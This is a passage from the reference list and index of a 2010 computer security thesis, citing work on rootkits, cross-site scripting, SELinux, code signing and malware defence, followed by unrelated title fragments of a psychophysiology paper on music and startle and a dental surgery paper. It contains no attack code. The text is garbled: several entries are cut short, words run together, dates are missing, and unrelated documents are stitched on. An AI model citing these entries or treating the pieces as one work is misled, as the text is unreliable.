rity, chapter 2.1.2. O'Reilly, 2005.
[94] D. Kristol and L. Montulli. RFC2109: HTTP state management mech-
anism. Technical report, Internet Engineering Task Force, Feb 1997.
[95] D. Kristol and L. Montulli. RFC2965: HTTP state management mech-
anism. Technical report, Internet Engineering Task Force, Oct 2000.
[96] G. Kroah-Hartman. Signed kernel modules. Linux Journal, 117:48–53,
[97] I. Krsul and E. H. Spafford. Authorship analysis: Identifying the author
of a program. Computers & Security, 16(3):233–257, 1997.
[98] C. Kruegel, W. Robertson, and G. Vigna. Detecting kernel-level rootkits
through binary analysis. In Proc. 20th Annual Computer Security Appli-cations Conference, pages 91–100, Dec 2004.
[99] V. T. Lam, S. Antonatos, P. Akritidis, and K. G. Anagnostakis. Puppetnets:
misusing web browsers as a distributed attack infrastructure. In Proc.
13th ACM Conference on Computer and Communications Security, pages221–234, Oct 2006.
[100] Programming language popularity.
Web Page, Jan 2010.
[101] Q. Liu, R. Safavi-Naini, and N. P. Sheppard. Digital rights management
for content distribution. In Proc. Australasian Information Security Work-shop Conference on ACSW Frontiers, volume 21, pages 49–58, 2003.
[102] P. Loscocco and S. Smalley. Integrating flexible support for security poli-
cies into the Linux operating system. In Proc. FREENIX Track: USENIXAnnual Technical Conference, pages 29–42, Jun 2001.
[103] M. T. Louw and V. Venkatakrishnan. Blueprint: Robust prevention of
cross-site scripting attacks for existing web browsers. In Proc. 30th IEEESymposium on Security and Privacy, pages 331–346, May 2009.
[104] R. Love. Linux Kernel Development. Novell Press, second edition, 2005.
[105] G. Maone. NoScript - JavaScript/Java/Flash blocker for a safer Firefox
experience! Web page (viewed 14 Apr 2008).
[106] G. Maone. Hardening the web with NoScript. ;Login: The USENIX Mag-
azine, 34(6):21–27, 2009.
[107] B. McCarty.
SELinux: NSA's Open Source Security Enhanced Linux.
O'Reilly Media, Inc., 2004.
[108] M. K. McKusick. Running "fsck" in the background. In Proc. 2nd USENIX
BSD Conference, pages 55–64, Feb 2002.
[109] A. J. Menezes, P. C. van Oorschot, and S. A. Vanstone. Handbook of Ap-
plied Cryptography. CRC Press, fifth edition, 1996.
[110] Microsoft Corporation.
Device PhysicalMemory object.
ticle (viewed 20 Feb 2010).
[111] Microsoft Corporation. Mitigating cross-site scripting with HTTP-only
cookies. MSDN Article (viewed 8 Feb 2010).
[112] Microsoft Corporation. A detailed description of the data execution pre-
vention (DEP) feature in Windows XP Service Pack 2, Windows XP TabletPC Edition 2005, and Windows Server 2003. Technical report, MicrosoftCorporation, Sep 2006.
[113] Microsoft Corporation. Description of the Windows file protection fea-
ture. Web Page, 2007.
[114] Microsoft Corporation. Digital Signatures for Kernel Modules on Systems
Running Windows Vista, Jul 2007.
[115] Microsoft Corporation. Description of the windows installer cleanup util-
Technical Report Q290301, Microsoft Corporation, 2008.
[116] Microsoft Corporation. WriteFileEx function. MSDN Article, Nov 2008.
[117] C. Moock. Essential ActionScript 3.0, chapter 19. Flash Player Security
Restrictions. O'Reilly Media, Inc., 1st edition edition, 2007.
[118] J. Morris. Have you driven an SELinux lately?
In Proc. Ottawa Linux
Symposium, Jul 2008.
[119] J. Moskowitz and D. Sanoy.
The Definitive Guide to Windows In-
staller Technology.
[120] H. Muhammad. Compiling from source. Web Page (viewed 16 Feb 2010).
[121] H. Muhammad. The Unix tree rethought: an introduction to GoboLinux.
Kuro5hin Article, May 2003.
[122] H. Muhammad and A. Detsch. Uma nova proposta para a árvore de di-
retórios UNIX. In Proceedings of the III WSL - Workshop em SoftwareLivre, 2002.
[123] D. Muthukumaran, A. Sawani, J. Schiffman, B. M. Jung, and T. Jaeger.
Measuring integrity on mobile phone systems. In Proc. 13th ACM Sym-posium on Access Control Models and Technologies, pages 155–164, Jun2008.
[124] R. Nolan and R. X. Tang. PC with multiple video-display refresh-rate
configurations using active and default registers. United States PatentApplication US2000/6049316, Apr 2000.
[125] S. Oaks. Java Security, chapter 12. Digital Signatures. O'Reilly Media,
Inc., 2nd edition, May 2001.
[126] T. Oda, G. Wurster, P. van Oorschot, and A. Somayaji. SOMA: Mutual ap-
proval for included content in web pages. In Proc. 15th ACM conferenceon Computer and Communications Security, pages 89–98, Oct 2008.
[127] Y. K. Okuji. GNU GRUB. Web Page, Dec 2008.
[128] P. Padala. Playing with ptrace, part 1. Linux Journal, 103, Nov 2002.
[129] A. Pennarun, B. Allombert, and P. Reinholdtsen. Debian popularity con-
[130] A. Pennington, J. Strunk, J. Griffin, C. Soules, G. Goodson, and G. Ganger.
Storage-based intrusion detection: Watching storage activity for suspi-cious behavior. In Proc. 12th USENIX Security Symposium, pages 137–151, Aug 2003.
[131] N. L. Petroni Jr., T. Fraser, J. Molina, and W. A. Arbaugh.
a coprocessor-based kernel runtime integrity monitor.
USENIX Security Symposium, pages 179–194, Aug 2004.
[132] N. L. Petroni Jr., T. Fraser, A. Walters, and W. Arbaugh. An architecture
for specification-based detection of semantic integrity violations in kerneldynamic data. In Proc. 15th USENIX Security Symposium, pages 289–304, Aug 2006.
[133] A. Pfiffer. Reducing System Reboot Time With kexec. Open Source De-
velopment Labs, Inc., Apr 2003.
[134] M. Pozzo and T. Gray. An approach to containing computer viruses. Co-
muters & Security, 6(4):321–331, 1987.
[135] N. Provos, P. Mavrommatis, M. A. Rajab, and F. Monrose. All your iFRAMEs
point to us. In Proc. 17th USENIX Security Symposium, pages 1–15, Aug2008.
[136] Red Hat, Inc. Fedora Core 5 - Release Notes, Feb 2006.
[137] C. Reis, J. Dunagan, H. J. Wang, O. Dubrovsky, and S. Esmeir. Browser-
Shield: Vulnerability-driven filtering of dynamic HTML. In Proc. 27thIEEE Symposium on Security and Privacy, pages 61–74, May 2006.
[138] C. Reis, J. Dunagan, H. J. Wang, O. Dubrovsky, and S. Esmeir. Browser-
shield: Vulnerability-driven filtering of dynamic html. ACM Transactionson the Web, 1(3), 2007.
[139] R. Repasi and S. Clausen. Method and system to scan firmware for mal-
ware. United States Patent Application US2007/0277241 A1, Nov 2007.
[140] R. Riley, X. Jiang, and D. Xu. An architectural approach to preventing
code injection attacks. In Proc. 37th Annual IEEE/IFIP International Con-ference on Dependable Systems and Networks, pages 30–40, Jun 2007.
[141] R. L. Rivest and B. Lampson. A Simple Distributed Security Infrastruc-
[142] A. Rubin and D. Geer. Mobile code security. IEEE Journal on Internet
Computing, 2(6):30–34, 1998.
[143] N. Ruff.
Windows memory forensics.
Journal in Computer Virology,
4(2):83–100, May 2008.
[144] R. Russell, D. Quinlan, and C. Yeoh. Filesystem Hierarchy Standard.
Filesystem Hierarchy Standard Group, 2.3 edition, Jan 2004.
[145] J. Rutkowska. Subverting Vista kernel for fun and profit. In Blackhat
USA, Aug 2006.
[146] R. Sailer, X. Zhang, T. Jaeger, and L. van Doorn. Design and implemen-
tation of a tcg-based integrity measurement architecture. In Proc. 13thUSENIX Security Symposium, pages 223–238, Aug 2004.
[147] J. Schuh.
Same-origin policy part 2:
Web Page, Feb 2007.
[148] sd and devik. Linux on-the-fly kernel patching without LKM. In Phrack,
volume 0x0b (0x3a), chapter 0x07. Dec 2001.
[149] R. Sekar, C. R. Ramakrishnan, I. V. Ramakrishnan, and S. A. Smolka.
Model-carrying code (MCC): a new paradigm for mobile-code security. InProc. 2001 New Security Paradigms Workshop, pages 23–30, Sep 2001.
[150] H. Shacham. The geometry of innocent flesh on the bone: Return-into-
libc w ithout function calls (on the x86). In Proc. 14th ACM Conferenceon Computer and Communications Security, pages 552–561, Oct 2007.
[151] H. Shacham, M. Page, B. Pfaff, E.-J. Goh, N. Modadugu, and D. Boneh.
On the effectiveness of address-space randomization. In Proc. 11th ACMConference on Computer and Communications Security, pages 298–307,Oct 2004.
[152] M. Sharif, W. Lee, and W. Cui. Secure in-VM monitoring using hardware
virtualization. In Proc. 16th ACM Conference on Computer and Commu-nications Security, Oct 2009.
[153] A. Siberschatz, P. B. Galvin, and G. Gagne. Operating System Concepts.
Wiley, seventh edition, 2005.
[154] E. Skoudis and L. Zeltser. Malware: Fighting Malicious Code. Prentice
Hall PTR, 2004.
[155] S. Smalley, C. Vance, and W. Salamon. Implementing SELinux as a linux
security module. Technical Report 01-043, NAI Labs, May 2002.
[156] S. Spainhour, E. Siever, and N. Patwardhan. Perl in a Nutshell, chapter
8.25. Benchmark. O'Reilly Media, Inc., 2nd edition, 2002.
[157] W. Stallings. Operating Systems: Internals and Design Principles. Pren-
tice Hall, fourth edition, 2001.
[158] B. Sterne. Security/CSP. Web Page (viewed 7 Jan 2010).
[159] B. Sterne. Site security policy draft (version 0.2). Web Page, Jul 2008.
[160] M. Stiegler, A. H. Karp, K.-P. Yee, T. Close, and M. S. Miller. Polaris: virus-
safe computing for Windows XP. Communications of the ACM, 49(9):83–88, 2006.
[161] J. Strunk, G. Goodson, M. Scheinholtz, C. Soules, and G. Ganger. Self-
securing storage: Protecting data in compromised systems. In Proc. 4thUSENIX Symposium on Operating Systems Design and Implementation,Oct 2000.
[162] S. Sudre. Packagemaker how-to. Web Page (viewed 29 Oct 2009).
[163] W. Sun, R. Sekar, Z. Liang, and V. N. Venkatakrishnan. Expanding mal-
ware defense by securing software installations. Lecture Notes in Com-puter Science, 5137/2008:164–185, 2008.
[164] L. Tauscher and S. Greenberg. How people revisit web pages: empirical
findings and implications for the design of history systems. InternationalJournal of Human Computer Studies, 47(1):97–137, 1997.
[165] The Open Web Application Security Project. OWASP Top 10 - 2010: The
Ten Most Critical Web Application Security Risks, Apr 2010.
[166] TIS Committee.
Tool Interface Standard (TIS) Executable and Link-
ing Format (ELF) Specification, version 1.2 edition, May 1995.
[167] Trusted Information Systems, Inc. Trusted XENIX version 3.0 final eval-
uation report. Technical Report CSC-EPL-92-001, National Computer Se-curity Center, Apr 1992.
[168] T. Y. Ts'o and S. Tweedie. Planned extensions to the Linux ext2/ext3
filesystem. In Proc. FREENIX Track: USENIX Annual Technical Con-ference, pages 235–243, Jun 2002.
[169] C. Tyler. Fedora Linux, chapter 8.4. O'Reilly, 2007.
[170] Social engineering (trojan) via gnome-loook.org. Web Page (viewed 13
[171] A. van de Ven. [patch] NX (No eXecute) support for x86, 2.6.7-rc2-bk2.
Mailing List Post, Jun 2004.
[173] A. van de Ven.
Introduce /dev/mem restrictions with a con-
GIT Commit, Apr 2008.
[174] L. van Doorn, G. Ballintign, and W. A. Arbaugh. Signed executables for
Linux. Technical Report CS-TR-4259, University of Maryland, 2001.
[175] V. N. Venkatakrishnan, R. Sekar, T. Kamat, S. Tsipa, and Z. Liang. An
approach for secure software installation. In Proc. 16th USENIX Confer-ence on System Administration (LISA), pages 219–226, Nov 2002.
[176] K. Vervloesem. Linux malware: an incident and some solutions. LWN.net
Article, Dec 2009.
[177] S. Vidyaraman, M. Chandrasekaran, and S. Upadhyaya. Position: The
user is the enemy. In Proc. 2007 New Security Paradigms Workshop,pages 75–80, Sep 2007.
[178] P. Vogt, F. Nentwich, N. Jovanovic, C. Kruegel, E. Kirda, and G. Vigna.
Cross site scripting prevention with dynamic data tainting and staticanalysis. In Proc. 14th Network and Distributed System Security Sym-posium, pages 67–78, Feb 2007.
[179] R. Wahbe, S. Lucco, T. E. Anderson, and S. L. Graham. Efficient software-
based fault isolatio. ACM SIGOPS Operating System Review, 27(5):203–216, 1993.
[180] K. M. Walker, D. F. Sterne, M. L. Badger, M. J. Petkac, D. L. Sherman,
and K. A. Oostendorp. Confining root programs with domain and typeenforcement (DTE). In Proc. 6th USENIX Security Symposium, Jul 1996.
[181] H. J. Wang, X. Fan, C. Jackson, and J. Howell. Protection and communica-
tion abstractions for web browsers in MashupOS. ACM SIGOPS Operat-ing Systems Review, 41(6):1–16, Dec 2007.
[182] Y.-M. Wang, D. Beck, B. Vo, R. Roussev, and C. Verbowski. Detecting
stealth software with strider ghostbuster. In Proc. 35th Annual IEEE/IFIPInternational Conference on Dependable Systems and Networks, pages368–377, Jun 2005.
[183] Z. Wang, X. Jiang, W. Cui, and P. Ning. Countering kernel rootkits with
lightweight hook protection. In Proc. 16th ACM Conference on Computerand Communications Security, Nov 2009.
[184] Web Application Security Consortium. WASC Threat Classification, Jan
[185] WebSense.
Super Bowl XLI / Dolphin Stadium - security labs alert.
Web Page, Feb 2007.
[186] K. C. Wilbur and Y. Zhu. Click fraud. Marketing Science, 28(2):293–308,
[187] C. Wright, C. Cowan, J. Morris, S. Smalley, and G. Kroah-Hartman. Linux
security modules: General security support for the Linux kernel. In Proc.
11th USENIX Security Symposium, pages 17–31, Aug 2002.
[188] C. P. Wright and E. Zadok. Unionfs: Bringing filesystems together. Linux
Journal, 128:24–29, Dec 2004.
[189] G. Wurster and P. van Oorschot. Self-signed executables: Restricting
replacement of program binaries by malware. In USENIX 2007 Workshopon Hot Topics in Security (HotSec 2007).
[190] G. Wurster and P. van Oorschot. The developer is the enemy. In Proc.
2008 New Security Paradigms Workshop, Sep 2008.
[191] G. Wurster and P. C. van Oorschot. System configuration as a privilege.
In USENIX 2009 Workshop on Hot Topics in Security (HotSec 2009).
[192] G. Wurster and P. C. van Oorschot. Towards reducing unauthorized mod-
ification of binary files. Technical Report TR-09-07, Carleton University,2009.
[193] Z. Ye, S. Smith, and D. Anthony. Trusted paths for browsers. ACM Trans-
actions on Information and System Security, 8 (2):153–186, 2005.
[194] M. Zalewski. Browser security handbook. Online Book (viewed 21 Feb
[195] X. Zhao, K. Borders, and A. Prakash. Towards protecting sensitive files
in a compromised system. In Proc. 3rd IEEE International Security inStorage Workshop, pages 21–28, Dec 2005.
Adobe Flash, see Flash
Cross-Site Request Forgery,
Cross-Site Scripting,
App Store, Bundle,
Package Manager,
Application Package,
dentry, see File-System, dentry
dica, Discretionary Access Control,
Bandwidth Stealing,
DNS Rebinding, Document Object Model,
Drive-By Downloads,
Clark-Wilson, Click Fraud,
Encapsulate Applications,
Execute Disable,
Configd, Configuration Locked,
Configuration State,
Extended Attributes,
Device PhysicalMemory,
Microsoft Windows, mood-nt,
GoboLinux, Guardian,
Originator Controlled Access Control,
Package Manager,
Parental Controls,
Information Stealing,
inode, see File-System, inode
Popularity, ptrace,
Recursive Script Inclusion, Rootkit-Resistant Disks,
Same Origin Policy,
Security Module,
Smart Phone, SOMA,
Malicious Hardware,
Mandatory Access Control,
System Administrator,
Guardian, Owner,
Contributions, Hypothesis, Publications,
Ugly, UI Redressing, see Clickjacking
WFP, Windows File Protection,
Source: http://wurster.ca/glenn/publications/Thesis-2010.pdf
International Journal of Psychophysiology 71 (2009) 37–42 Contents lists available at International Journal of Psychophysiology Modulation of the startle reflex by pleasant and unpleasant music Mathieu Roy, Jean-Philippe Mailhot, Nathalie Gosselin, Sébastien Paquette, Isabelle Peretz Department of Psychology, BRAMS, University of Montreal, Canada Available online 23 July 2008
Autologous fat grafts placed around temporomandibular joint total joint prostheses to prevent heterotopic bone formation Larry M. Wolford, DMD, Carlos A. Morales-Ryan, DDS, MSD, Patricia Garcia Morales, DDS, MS, and Daniel Serra Cassano, DDS the treatment of ankylosis This study evaluated 1) the efficacy of packing autologous fat grafts of the temporomandibular around temporomandibular joint (TMJ) total joint prosthetic reconstruc-